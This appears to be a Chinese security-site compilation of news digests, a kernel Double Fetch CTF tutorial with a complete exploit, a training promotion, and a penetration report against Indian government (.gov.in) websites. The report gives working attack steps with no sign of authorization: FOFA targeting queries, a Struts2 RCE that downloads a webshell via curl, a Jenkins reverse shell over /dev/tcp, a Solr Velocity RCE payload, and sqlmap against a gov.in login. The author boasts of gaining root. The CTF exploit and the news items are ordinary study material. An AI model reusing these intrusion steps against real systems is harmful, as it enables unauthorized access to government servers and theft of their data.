1、BitForge零日漏洞可被利用以窃取加密货币 https://www.bleepingcomputer.com/news/cryptocurrency/new-bitforge-cryptocurrency-wallet-flaws-lets-hackers-steal-crypto/ 研究人员发现的加密货币钱包第一个漏洞 (CVE-2023-33241) 影响 GG18 和 GG20 门限签名方案 (TSS)，这些方案被认为是 MPC 钱包行业的开创性和基础性的，允许多方生成密钥和共同签署交易。在 GG-18、GG-20 和 Lindell 17 等广泛使用的加密协议的实施中，多个名为“BitForge”的零日漏洞影响了流行的加密货币 2、开源项目Moq新版本涉及用户隐私问题 https://www.bleepingcomputer.com/news/security/popular-open-source-project-moq-criticized-for-quietly-collecting-data/ 开源项目 Moq（发音为“Mock”）因其在其最新版本中悄悄包含有争议的依赖项而招致了尖锐的批评。Moq 分布在 NuGet 软件注册表上，每天的下载量超过 100,000 次，在其生命周期内下载量超过 4.76 亿次。Moq 本周发布的 4.20.0 版本悄然包含了另一个项目 SponsorLink，该项目在开源软件消费者中引起了轩然大波，他们将此举比作违 3、CISA 发现名为 Whirlpool 的新后门，用于 Barracuda ESG 攻击 https://securityaffairs.com/149392/hacking/whirlpool-backdoor-barracuda-esg-attacks.html 美国网络安全和基础设施安全局 (CISA) 在针对 Barracuda ESG 设备的攻击中发现了一个名为 Whirlpool 的新后门。 4、北爱尔兰警察局（PSNI）警察的数据被泄露在网上 https://securityaffairs.com/149359/data-breach/psni-data-leak.html 北爱尔兰警察局 (PSNI) 应信息自由请求错误地共享了所有 10,000 名在职警察的敏感数据。 5、Android 2023 年 8 月安全更新修复了 40 个漏洞 https://www.securityweek.com/40-vulnerabilities-patched-in-android-with-august-2023-security-updates 随着 2023 年 8 月安全更新的发布，Google 修复了 Android 操作系统中的 40 多个漏洞。 据这家科技巨头称，最严重的漏洞是 CVE-2023-21273，这是一个影响系统组件的关键远程代码执行问题。利用该漏洞不需要用户交互或提升权限。CVE-2023-21273 影响 Android 11、12、12L 和 13。 6、搜狗输入法加密机制存在严重漏洞，可被CBC填充攻击和窃听明文 https://thehackernews.com/2023/08/encryption-flaws-in-popular-chinese.html 多伦多大学公民实验室的调查结果对腾讯搜狗输入法中使用的加密机制进行了分析，该应用程序在 Windows、Android 和 iOS 上每月拥有超过 4.55 亿活跃用户。这些漏洞源于该服务的自定义加密系统 EncryptWall，允许网络窃听者提取文本内容并访问敏感数据。“Windows和Android版本的搜狗输入法在该加密系统中存在漏洞，其中包括CBC padding oracle攻击的漏洞，该漏洞允许网络窃听者恢复加密网络传输的明文，从而 ７、网传58集团“倒卖”毕业生简历信息 https://www.freebuf.com/news/374397.html 近日，国内多家媒体相继发文称，前 58 员工透露集团内部借助招聘名义，倒卖大量学生简历，此事一经爆出迅速引起社会讨论。随着此事热度不断上升，网友陆续扒出 58 集团在收集到大批学生简历后，高价卖给培训机构，以此收取返利。 ８、为打击漏洞利用，谷歌将每周更新Chrome安全补丁 https://www.freebuf.com/news/374385.html 谷歌宣布，从Chrome浏览器116版本开始，其安全更新频率将从过去的每两周一次压缩为每周一次，以解决攻击者通过补丁更新的时间间隔，利用N Day和0 Day漏洞进行攻击活动。 ９、每天罚款 100 万克朗，挪威将对 Meta 开巨额罚单 https://www.ithome.com/0/711/030.htm 挪威监管机构 Datatilsynet 曾于 7 月 17 日宣布，如果 Meta 公司无法满足该机构的监管要求，妥善解决隐私泄露问题，那么将执行罚款措施。 10、航旅业大地震：常旅客积分系统曝严重漏洞 https://www.secrss.com/articles/57535 黑客可利用常旅客系统漏洞窃取客户隐私数据和积分，甚至控制整个系统给任何人授予无限飞行里程或酒店住宿积分。Points.com是全球航空公司和酒店常旅客积分计划的主要数字基础设施提供商之一。近日，安全研究人员发现Points.com的API中存在可利用漏洞，攻击者可利用这些漏洞泄漏客户数据、窃取客户的“忠诚货币”（例如里程），甚至接管Points全球管理帐户获得对整个忠诚度计划的控制权。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 Double Fetch(双取)是一种条件竞争的漏洞，相关的论文发表在USENIX，论文链接：https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-wang.pdf Double Fetch Double Fetch是内核的一种漏洞类型，发生在内核从用户空间中拷贝数据时，两次访问了相同一块内存。如下图示（图片来自论文），内核从用户空间拷贝数据时，第一次拷贝会进行安全检测，而第二次拷贝时才会进行数据的使用，那么在第一次拷贝与第二次拷贝的间隙，就能够进行恶意数据篡改。举个例子，在第一次时从用户空间中获取了需要拷贝的长度，并进行长度的检测，但是在第二次拷贝时会再次拷贝长度，并且根据该长度进行数据的拷贝。但是此时的长度是没有经过校验的，因此当该长度在第一次拷贝与第二次拷贝之间被修改，就会导致漏洞的发生。这种漏洞就被称之为Double Fetch。 论文的作者总结了容易发生Double Fetch的情况，如下图示（图片来自论文）。通常用户进程会通过指定的消息格式与内核进行通信，而消息格式通常由消息头与消息体构成。消息头包含了一些特殊属性，比如消息的长度，消息的类型等。那么内核通常会取出消息头，根据消息头的信息，进行不同的分支执行。若在进入分支后，内核依旧提取出消息头，并使用了前面使用过的字段，就非常容易发生Double Fetch，因为在这两次提取的过程中，用户态的程序可以修改消息头。 作者根据Double Fetch发生的场景，并将其进行分类 类型选择 长度检查 浅拷贝 类型选择 类型选择的Double Fetch，如下图示（图片来自论文）。代码截取自cxgb3 main.c。可以看到下述代码首先通过copy_from_user函数从useraddr中拷贝数据到cmd中，而useraddr为用户空间的地址。而后续的流程会根据从useraddr中提取出的数据从而选择执行。并且在每个分支中，又通过copy_from_user函数从useraddr的地址中取出数据，做后续的处理。若在后续的处理中又重复使用到了cmd那么就会导致Double Fetch。 长度选择 长度选择的Double Fetch，如下图示（图片来自论文）。在第一次拷贝是通过copy_from_user从arg中获取数据，并且提取了header.Size，在第二次时又重复了这个过程，这就是明显的Double Fetch。若在两次提取之间修改了header.Size值，并通过aac_fib_send函数发送数据，那么就会导致漏洞的发送，即可以泄露比原本header.Size值更大的数据量。 浅拷贝 浅拷贝则是第一次的拷贝只是将指向用户数据的指针拷贝到内核中，后续在将用户数据拷贝进来。如下图示（图片来自论文）。第一次获取时是通过指向用户数据的指针的指针，而第二次同样是这么获取的，那么在第一次与第二次的间隔中修改指针的指向就会导致数据被修改。 举个例子，即内核拷贝时并不是把能够读取用户数据的地址拷贝进来，而是将指向该地址的地址给拷贝进来，即下图中的ptr，因此后续内核在读取数据的时候都是通过ptr进行获取，那么在两次获取的中途修改了ptr的指向，那么就可以使得内核指向恶意数据。 总结一下Double Fetch的利用流程 内核会从用户空间中获取数据，并且会两次获取相同空间的数据 在两次获取的过程中没有检测获取的数据是否一致 最后在两次获取的过程中，篡改该空间的数据 20180ctf-final-baby 题目链接：https://github.com/h0pe-ay/Kernel-Pwn/tree/master/0ctf-final-baby 在模块中存在baby_ioctl函数，若rsi的值为0x6666则会将flag输出，由于是通过printk，因此需要通过dmesg输出，若rsi为0x1337，则会经过一个校验函数，若通过该校验流程，则会将flag的值与传入的地址的内容进行比较，若内容完全一致，那么则会将flag直接输出，同样的该输出是通过printk，因此需要通过dmesg进行打印。 接着看校验函数，该函数很简单，接受三个参数，a1、a2、a3，若a1 + a2 < a3则通过检查。而a1的值是我们所控制的，即rdx寄存器的值，而a3的值则是通过&current_task中获取的。 可以发现从&current_task中获取的地址为0x7ffffffff000 下图为用户空间的地址分布，可以看到0x7ffffffff000为末尾地址，因此该检测即使若传入的地址是用户空间地址则通过，传入内核空间地址就不通过。 这么做的原因是因为，flag字符串是硬编码到驱动中的，若能够读取内核空间的内容，岂不是可以直接读取了？因此该题做了隔离。 那么这题就能够使用Double Fetch进行利用，重点来看检测部分。驱动会进行三块检测 检查传入的地址是否为用户空间的地址 检查传入的地址的内容的值是否为用户空间的地址 检查传入的长度是否与flag的长度一致 总的来说从用户空间中我们传入了一个结构体 typedef struct {    char *flag_addr;    unsigned long flag_len; }; 可以看到该题在检测的时候获取的用户空间的地址v5，接着在循环过程中再一次获得用户空间的地址v5，在这两次获取的过程中并没有去比较值是否被修改了，那么就导致了Double Fetch。 利用的思路如下 在检测阶段，v5的我们使用用户空间的变量值进行赋值，即v5 = buf 而进入比较阶段，v5的值我们使用flag的地址值进行赋值，即v5 = flag 那么如何获得进入比较阶段的时间点呢，可以看到题目即使比较失败也不会发生异常而是简单的返回，因此我们可以开启一个线程，不断的修改v5 = flag即可 ... void * rewrite_flag_addr(void *arg) { pdata data = (pdata)arg; while(finish == 0) { data->flag_addr = (char *)target_addr; //printf("%p\n",data_flag.flag_addr); } } ... err = pthread_create(&ntid, NULL, rewrite_flag_addr, &data_flag); ... 具体流程如下图，这里用线程的原因 主线程与子线程异步执行 线程之间共享内存信息 因此可以利用其他线程去修改共享的内存 完整exp #include <stdio.h> #include <fcntl.h> #include <string.h> #include <unistd.h> #include <sys/ioctl.h> #include <pthread.h> #define MAXSIZE 1024 #define MAXTIME 1000000 unsigned long target_addr; int finish; typedef struct { char* flag_addr; unsigned long flag_len; }data, *pdata; data data_flag; int fd; void * rewrite_flag_addr(void *arg) { pdata data = (pdata)arg; while(finish == 0) { data->flag_addr = (char *)target_addr; //printf("%p\n",data_flag.flag_addr); } } int main() { fd = open("/dev/baby", O_RDWR); __asm( ".intel_syntax noprefix;" "mov rax, 0x10;" "mov rdi, fd;" "mov rsi, 0x6666;" "syscall;" ".att_syntax;" ); char buf[MAXSIZE]; char *target; int count; int flag = open("/dev/kmsg", O_RDONLY); if (flag == -1) printf("open dmesg error"); while ((count = read(flag, buf, MAXSIZE)) > 0) { if ((target = strstr(buf, "Your flag is at ")) > 0) { target = target + strlen("Your flag is at "); char *temp = strstr(target, "!"); target[temp - target] = 0; target_addr = strtoul(target, NULL, 16); printf("flag address:0x%s\n",target); printf("flag address:0x%lx\n", target_addr); break; } } data_flag.flag_addr = buf; data_flag.flag_len = 33; pthread_t ntid; int err; err = pthread_create(&ntid, NULL, rewrite_flag_addr, &data_flag); for (int i = 0; i < MAXTIME; i++) { ioctl(fd, 0x1337, &data_flag); data_flag.flag_addr = buf; //printf("%d\n",i); } finish = 1; pthread_join(ntid, NULL); printf("end!"); //system("dmesg | grep flag"); }

0x01、信息收集阶段 注：本次信息收集过程主要使用FOFA网络探测平台 https://fofa.info/=== 一开始进行收集的时候，有点迷，直接进行了大面积的"gov.in"域名收集 host="gov.in" && country="IN" 哈哈68465条数据，想想就起飞，但是有个问题来了，怎么下载到本地，高级用户的API也只能调用下载1w条数据，左思右想。 试着写了个脚本看看： import pythonfofa import csv filename = "IN_domain.csv" email = 'u_mail' key = 'u_API_KEY' search = pythonfofa.Client(email, key) get_data = search.search('host="gov.in" && country="IN"', size=70000) # print(get_data) requests = [result[1] for result in get_data['results']] print(requests) # 打开CSV文件并设置写入模式 with open(filename, "w", newline="") as file:    writer = csv.writer(file)    # 遍历请求列表    for request in requests:        # 在控制台打印域名        print(request)        # 检测域名是否包含"http://"        if not request.startswith("http://") and not request.startswith("https://"):            # 如果不包含，则在域名前添加"http://"            request = "http://" + request        # 在域名后添加斜杠"/"        request += "/"        # 将请求和值"1"作为一行写入CSV文件        writer.writerow([request, 1]) 是的，肯定不能跑，下断点，调试看看 很好确实是不能直接干7w条，换个收集思路，收集主流框架进行相应的漏扫 主流框架的相关漏洞的FOFA规则语句： Fastjson app="Fastjson" && host="in" && country="IN" && status_code="200" && (port="80" || port="443") Struts2 app="Struts" && host="in" && country="IN" && status_code="200" && (port="80" || port="443") Log4j2 (app="Log4j2" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")) 其他的也都大同小异，照葫芦画瓢就行。 目标站点收集差不多了，就是漏洞探测阶段了。 0x02、漏洞探测及利用 Struts2： 直接掏出大范围漏扫AWVS就行批量漏洞探测： 第一天数据就直接起飞，因为本次目标是==getshell==直接忽略中低危漏洞告警，查看高危漏洞： 很好一堆==Struts2==漏洞，直接上工具： 得到一个RCE（远程命令执行漏洞），远程写入==shell==，先利用工具生成一个==Antsword(蚁剑)jsp格式的shell== 将shell放到一个公网服务器上，接着执行命令查看web路径：/var/tomcat9/pmrportal/ROOT/ 直接执行 curl -o /var/tomcat9/pmrportal/ROOT/shell.jsp http://u_ip/antsword.jsp 然后webshell工具Antsword连接即可： 爆出的该S2-045的漏洞的还有几个，getshell方式同上，不进行细述了___________。 Weblogic： 很好用的awvs，直接上工具注入内存马： 冰蝎连接webshell： 同类型的漏洞还有几个，getshell的方式都一致，不一一概述了》》 （PS：这个时候已经有些疲软了，没有去手测upload的点） Jenkins： 中途其他框架没有收获的时候，就去浏览知识的海洋了，看到一个存在大量未授权+RCE的框架漏洞（Jenkins），二话不说，直接上FOFA： (app="JENKINS" && title=="Dashboard [Jenkins]" && country="IN" && status_code="200") && (port="80" || port="443") 一看86条资产，有戏，数量不多，直接手测： 存在未授权，访问manager --> script页面，进行命令执行测试： println "ls -al".execute().text 存在命令执行，尝试反弹shell： println "bash -i >& /dev/tcp/ip/port 0<&1".execute().text 接收shell的服务器开启端口监听： 执行命令 发现没有shell反弹过来，猜测不能在web端执行反弹shell，于是将反弹shell的命令写入.sh文件中，然后执行，进行反弹shell操作： 在sh文件中写入如下内容： bash -i >& /dev/tcp/ip/port 0<&1 保存在开放的web端口，在jenkins服务中执行如下curl命令远程下载sh文件： println "curl - o /tmp/jenkins.sh http://u_ip:port/jenkins.sh".execute().text 查看.sh文件是否获取成功： println "ls -al /tmp".execute().text 获取.sh文件成功，执行文件，反弹shell： 开启监听： 执行命令，启动.sh文件： println "bash /tmp/jenkins.sh".execute().text 成功监听到谈过来的shell，又拿下一台！其他的没有存在未授权，便没有尝试。 Apache-Solr 闲着没事，打开文库看了几篇RCE复现，心血来潮，打开FOFA： country="IN" && app="Apache-Solr" && status_code="200" && (port="443" || port="80") 数据不大，接着手测，拿到三个未授权(不需要登陆)： ==授权==： ==未授权==： 拿到未授权之后，进行CVE探测： 访问/solr/admin/cores/，获取name => music 接着拼接路径/solr/music/config/查看用户配置信息： 都为true，可直接利用公网披露的payload进行RCE， GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22whoam Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 测试是否出网： 修改执行命令为 curl%20xtolsc.dnslog.cn 可出网，直接反弹shell： GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22bash% Host: ip accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close VPS开启端口监听：nc -lvvnp 5000 接听到弹过来的shell了，好，又拿下一台，root权限。 其他漏洞发现 反射型XSS 具体测试过程均无任何难度，无须bypass黑名单之类的，测试语句 <script>alert(1)</script> SQL注入 这类没有具体测试，发现注入点之后直接上SQLmap开扫： sqlmap https://******.gov.in/****/Validate.jsp --data "email=a@a.com&password=123456" --random-agent -t 10 -p password --proxy=http://127.0.0.1:7890 --dbms=mysql 诸如其他的漏洞也有发现，但不是本次渗透的重点，便没重点去深入。 渗透总结 本次测试周期长，测试目标暴露点多，非常有趣的一次渗透实战，后期有其他事儿，就没法全身心投入，蛮可惜的。

1、Sandworm组织试图入侵乌克兰军方作战数据交换系统 https://ssu.gov.ua/uploads/documents/2023/08/08/tekhnichniy-zvit-3.pdf Sandworm组织为俄罗斯军事情报部门背景的APT组织。该组织试图侵入用于规划武装部队行动的电子系统，此次行动被乌克兰安全人员发现并阻止，Sandworm组织尝试获取有关武装部队行动、国防军位置和行动、其技术支持等的敏感信息。研究人员发现近十个针对系统进行窃密的恶意间谍软件程序。 2、微软Visual Studio Code存在漏洞可被利用以窃取密码 https://cycode.com/blog/exposing-vscode-secrets/ 微软的 Visual Studio Code (VS Code) 代码编辑器和开发环境存在一个漏洞，允许恶意扩展检索存储在 Windows、Linux 和 macOS 凭据管理器中的身份验证令牌。这些令牌用于与各种第三方服务和 API（例如 Git、GitHub 和其他编码平台）集成，因此窃取它们可能会对受损组织的数据安全造成严重后果，可能导致未经授权的系统访问、数据泄露、 ETC。 3、国际刑警组织将16shop网络钓鱼即服务平台关闭 https://www.group-ib.com/media-center/press-releases/interpol-16shop/ 国际刑警组织和网络安全公司之间的联合行动逮捕并关闭了臭名昭著的 16shop 网络钓鱼即服务 (PhaaS) 平台。网络钓鱼即服务平台为网络犯罪分子提供了进行网络钓鱼攻击的一站式服务。这些平台通常包含您需要的一切，包括电子邮件分发、知名品牌的现成网络钓鱼工具包、托管、数据代理、受害者概览仪表板以及其他有助于提高运营成功率的工具。这些平台存在重大风险，因为它们降低了缺乏经验的网络犯罪分子的进入门槛，为他们提供了一种简单且经济高效的方式，只需点击几下即可发起 4、EvilProxy用于大规模云帐户接管计划 https://securityaffairs.com/149348/hacking/cloud-account-takeover-scheme-evilproxy.html 利用 EvilProxy 的云帐户接管计划袭击了全球组织的 100 多名高层管理人员 ，EvilProxy 被发现向 100 多个组织发送了 120,000 封网络钓鱼电子邮件，以窃取 Microsoft 365 帐户。 5、英特尔CPU侧通道攻击暴露敏感数据 https://securityaffairs.com/149326/hacking/downfall-intel-cpu-side-channel-attack.html 谷歌研究员 Daniel Moghimi 设计了一种新的英特尔 CPU 侧通道攻击技术，名为 Downfall，该技术依赖于一个被追踪为CVE-2022-40982 的漏洞。攻击者可以利用此漏洞访问和窃取共享同一系统的其他用户的数据。恶意软件可以执行 Downfall 攻击来窃取密码、加密密钥等敏感信息以及银行详细信息、个人电子邮件和消息等私人数据。 6、Western Digital、Synology NAS 漏洞暴露数百万用户文件 https://www.securityweek.com/western-digital-synology-nas-vulnerabilities-exposed-millions-of-users-files/ WD 和 Synology NAS 设备中发现的严重漏洞可能会泄露数百万用户的文件。 7、新报告揭露 Vice Society 与 Rhysida 勒索软件的合作 https://thehackernews.com/2023/08/new-report-exposes-vice-societys.html 双重勒索勒索软件组织Rhysida和Vice Society之间发现了战术上的相似之处，包括针对教育和医疗保健行业。 8、Android 14 引入了新的安全措施，允许禁用2G https://security.googleblog.com/2023/08/android-14-introduces-first-of-its-kind.html Android 14 引入了新的安全措施来降低与 2G 网络相关的风险，允许用户和企业禁用 2G 连接并防止潜在的攻击。 9、AMD Zen CPU皆中招，新型Inception攻击能从中泄露敏感数据 https://www.freebuf.com/news/374277.html 苏黎世联邦理工学院的研究人员发现了一种新型瞬态执行攻击，能在所有型号的 AMD Zen CPU上执行特定命令并泄露敏感数据。通过此种 Inception攻击实现的数据泄露速率为每秒39 字节，窃取 16 个字符的密码大约需要半秒，窃取 RSA 密钥需要 6.5 秒。 10、Clop勒索软件提供种子以用于访问MOVEit攻击中被盗的数据 https://www.infosecurity-magazine.com/news/clop-gang-offers-data-downloads/ 安全研究员多米尼克·阿尔维耶里（Dominic Alvieri）在Twitter上透露了这一消息，截图显示了几名大牌受害者，他们的数据正在通过P2P共享提供。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、微软周二补丁日修复了 2 个被主动利用的漏洞 https://securityaffairs.com/149299/security/microsoft-patch-tuesday-august-2023.html Microsoft 2023 年 8 月星期二补丁安全更新解决了 74 个漏洞，其中包括两个被积极利用的漏洞。 2、英国选举委员会披露数据泄露事件 https://securityaffairs.com/149288/data-breach/uk-electoral-commission-data-breach.html 英国选举委员会在 2014 年至 2022 年间遭受了一次数据泄露，暴露了选民的个人信息。 3、FBI 警告骗子冒充 NFT 开发人员进行欺诈 https://securityaffairs.com/149251/cyber-crime/fbi-nft-scam.html FBI 警告网络犯罪分子冒充 NFT 开发商窃取加密货币和其他数字资产。 4、黑客滥用 Cloudflare 隧道进行秘密通信 https://thehackernews.com/2023/08/hackers-abusing-cloudflare-tunnels-for.html 新研究表明，威胁行为者正在滥用 Cloudflare Tunnels，从受感染的主机建立隐蔽通信通道并保留持久访问权限。 5、新的 Yashma 勒索软件变种针对多个英语国家和中国 https://thehackernews.com/2023/08/new-yashma-ransomware-variant-targets.html 至少自 2023 年 6 月 4 日起，未知威胁行为者正在使用 Yashma 勒索软件的变体来针对英语国家、保加利亚、中国和越南的各个实体。 6、大规模网络钓鱼活动使用 800 多个诈骗域名冒充 340 家公司 https://www.imperva.com/blog/analysis-of-a-phishing-campaign 该网络钓鱼活动源自俄罗斯，但冒充乌克兰人，利用高质量的单页应用程序创建令人信服的网站并窃取信用卡和银行详细信息。 7、研究人员披露针对OpenBullet工具的恶意软件活动 https://www.kasada.io/threat-intel-openbullet-malware/ 研究人员发现了一项针对 OpenBullet 用户的恶意软件活动，OpenBullet 是犯罪社区中流行的一种用于进行撞库攻击的工具，这些社区内共享多个恶意 OpenBullet 配置文件，导致在用户计算机上安装远程访问特洛伊木马 (RAT)。OpenBullet 是一个合法的开源渗透测试工具，旨在自动执行网络安全专业人员执行的重复任务，以帮助确保网站和网络应用程序的安全。 8、Clop勒索软件组织利用MOVEit漏洞窃取800万人的医疗档案 https://www.theregister.com/2023/07/27/maximus_deloitte_moveit_hack/ 俄罗斯勒索软件团队 Clop 声称利用 MOVEit 漏洞攻击了会计公司、披萨和生日派对连锁店和政府承包商。在向美国证券交易委员会提交的文件中，负责管理医疗补助和医疗保险等美国政府项目的 Maximus 透露，Clop勒索组织窃取了一些文件。Maximus 公司认为这些文件包含至少 8 至 1100 万人的个人信息，包括社会安全号码、受保护的健康信息和/或其他个人信息。 9、研究人员披露为了部署DarkGate恶意软件的钓鱼活动 https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/ 研究人员发现了一个使用劫持电子邮件线程进行网络钓鱼的全球活动，该活动会导致下载名为 DarkGate 的复杂恶意软件。下载恶意软件的用户会收到一个 MSI 文件，其中包含两个嵌入文件，其中包含用于执行的编码 shellcode。DarkGate 还对两个嵌入字符串使用独特的解码，揭示发送到 C2 的命令和恶意软件的配置。在 DarkGate 的网络活动中观察到了循环 XOR 和自定义 Base64 解码等混淆技术。 10、涉“违规泄露客户信息”等6项违法违规，中行被罚210万 https://www.freebuf.com/news/374201.html 《银行科技研究社》消息：国家金融监督管理总局7月18日发布的行政处罚信息显示，中行嘉兴分行存在6项主要违法违规行为，其中包括“违规泄露客户信息”等，依据《中华人民共和国银行业监督管理法》第四十六条第五项、第四十八条第二项，《中华人民共和国商业银行法》第七十三条第三项，被原银保监会嘉兴监管分局处以罚款210万元。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、美国的医院计算机系统遭遇网络攻击 https://www.theguardian.com/us-news/2023/aug/04/cyberattack-us-hospitals-california 一场网络攻击扰乱了美国各地医院的计算机系统，迫使多个州的急诊室关闭，救护车被迫改道。黑客攻击导致多个州的医疗设施陷入混乱。在康涅狄格州，曼彻斯特纪念医院和罗克维尔总医院的急诊科周四大部分时间关闭，患者被转移到附近的其他医疗中心。 2、特斯拉的信息娱乐系统可越狱并解锁付费功能 https://www.bleepingcomputer.com/news/security/tesla-infotainment-jailbreak-unlocks-paid-features-extracts-secrets/ 柏林工业大学的研究人员开发了一种方法，可以对所有最新特斯拉车型中使用的基于 AMD 的信息娱乐系统进行越狱，并使其运行他们选择的任何软件。另外，此次黑客攻击还允许研究人员提取特斯拉在其服务网络中用于汽车身份验证的独特硬件绑定 RSA 密钥，以及电压故障以激活特斯拉汽车的座椅加热和“加速提升”等软件锁定功能。业主通常需要付费。 3、微软修补了Power Platform漏洞 https://thehackernews.com/2023/08/microsoft-addresses-critical-power.html 微软近日修补了影响Power Platform 的一个关键安全漏洞，但在此之前它因未能迅速采取行动而受到批评。该漏洞可能导致未经授权访问用于 Power Platform 自定义连接器的自定义代码功能。如果秘密或其他敏感信息嵌入到自定义代码功能中，潜在的影响可能是意外的信息泄露。据称微软已于2023年6月7日发布了初步修复程序，但直到2023年8月2日，该漏洞才被完全堵塞。 4、一对纽约夫妇承认在Bitfinex黑客攻击中洗钱 36 亿美元 https://thehackernews.com/2023/08/nyc-couple-pleads-guilty-to-money.html 一对来自纽约市的已婚夫妇承认了与 2016 年加密货币证券交易所 Bitfinex 遭到黑客攻击有关的洗钱指控，该事件导致约 120,000 枚比特币被盗。一年多前，35 岁的伊利亚·利希滕斯坦 (Ilya Lichtenstein) 和他 33 岁的妻子希瑟·摩根 (Heather Morgan)于 2022 年 2 月被捕，被告持有的约 95,000 件被盗加密资产被没收。这些基金当时的估值为 36 亿美元。此后，美国政府表示已扣押了与此次泄露 5、中国牵头国际标准《网络安全工业互联网平台安全参考模型》正式发布 https://www.freebuf.com/news/374087.html 2023年7月，我国牵头提出的国际标准ISO/IEC 24392：2023《网络安全工业互联网平台安全参考模型》正式发布。该提案于2018年4月提交至ISO/IEC JTC1/SC27，后经研究，于2019年6月正式立项；2023年7月正式发布。我国3名专家担任该国际标准提案的编辑和联合编辑。 6、半数人工智能开源项目引用存在漏洞的软件包 https://www.secrss.com/articles/57396 开源在 AI 技术堆栈中发挥着越来越重要的作用，但大多数项目(52%)引用了存在已知漏洞的易受攻击的依赖项。 7、微软警告大型体育赛事正面临高危网络安全风险 http://www.anquan419.com/knews/24/5681.html 微软发布一份报告，警告大型体育赛事面临的网络风险面正在迅速扩大，基于运动团队、体育联盟以及体育场所等环境中的网络和互联设备的可观数量，这些高价值信息在大规模赛事直播等情况下可能会很容易受到攻击。 8、朝鲜APT入侵俄罗斯导弹工程公司 NPO Mashinostroyeniya https://securityaffairs.com/149263/apt/north-korea-hacked-russian-npo-mashinostroyeniya.html 两个与朝鲜有关联的 APT 组织破坏了俄罗斯大型导弹工程公司 NPO Mashinostroyeniya 的基础设施。 9、一种新的复杂 SkidMap 变体针对不安全的 Redis 服务器 https://securityaffairs.com/149258/malware/skidmap-malware-redis-servers.html 一项新的活动针对 Redis 服务器，这次攻击中使用的恶意软件是 SkidMap 恶意软件的新变种。Skidmap 是趋势科技于 2019 年 9 月检测到的一款针对 Linux 机器的加密挖矿程序。 10、新的“深度学习声学侧信道攻击”破译笔记本按键的准确率高达 95% https://thehackernews.com/2023/08/new-deep-learning-attack-deciphers.html 一组学者设计了一种“基于深度学习的声学旁道攻击”，可用于对附近手机记录的笔记本电脑击键进行分类，准确率高达 95%。研究人员 Joshua Harrison、Ehsan Toreini 和 Maryam Mehrnezhad在上周发表的一项新研究中表示：“当对使用视频会议软件 Zoom 记录的击键进行训练时，准确率达到了 93%，创下了媒体的新纪录。” 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

为深入学习贯彻习近平总书记关于网络强国的战略思想，加强网络安全宣传教育和人才培养，赋能学校打造经验丰富的网安教学师资队伍，全面提升网络安全技能的实战教学水平。2023年7月31日至8月4日，由湖南蚁景科技有限公司主办、广州大学网络空间安全学院协办的“2023网络安全高级研修班”在广州圆满结束。 本次研修班聚焦网安学科实战竞赛，针对CTF-逆向开展技能实训。来自全国各地的网络安全相关专业负责人、学科带头人、专业骨干教师齐聚广州参加本次研修班。同时，还有多名老师通过线上直播方式参与。 开班仪式上，广州大学网络空间安全学院党委书记林焕清为本次研修班致辞，对来自五湖四海的参会老师表达了热烈的欢迎。 广州大学方滨兴院士实验班教研室主任，广州大学网络空间安全学院副院长王乐发表了《“方班”——网络空间安全人才培养创新模式探索与实践议题》主题报告，围绕方滨兴院士设计的“方班”建设理念、目标和体系，详细介绍了“方班”的建设历程，在网安人才培养新模式上所做的探索和实践，重点讲述了方班创新课程对学生熵减、求源、实践和思辨能力的全方位培养，以及方班“授之以渔，掌握方法”的教学特色，为参会老师在特色网安专业建设和人才培养工作方面提供了宝贵的思路和启示。 本次研修班课程聚焦的“CTF-逆向”在网安学科竞赛中的难度相对较高，前期主办方从教学安排、师资配备、课程内容等诸多方面做了最精心的策划与安排，聘请了来自国际知名网安战队，具有多年逆向实战及培训经验，进入2022 DEFCON 总决赛，多次参与国内/国际知名网安赛事命题，并多次获得CTF大赛最高奖的知名讲师担任研修班课程主讲。 实战经验丰富的讲师通过生动的讲解和案例分析，向参会老师介绍了CTF-逆向的基本概念、技术原理和实践方法。参会老师们积极互动，提问发言，营造了良好的研修班学习氛围。通过数天的课程学习，参会老师对 CTF 逆向工程知识有了更全面的了解，并深入实践了CTF逆向的解题实操。 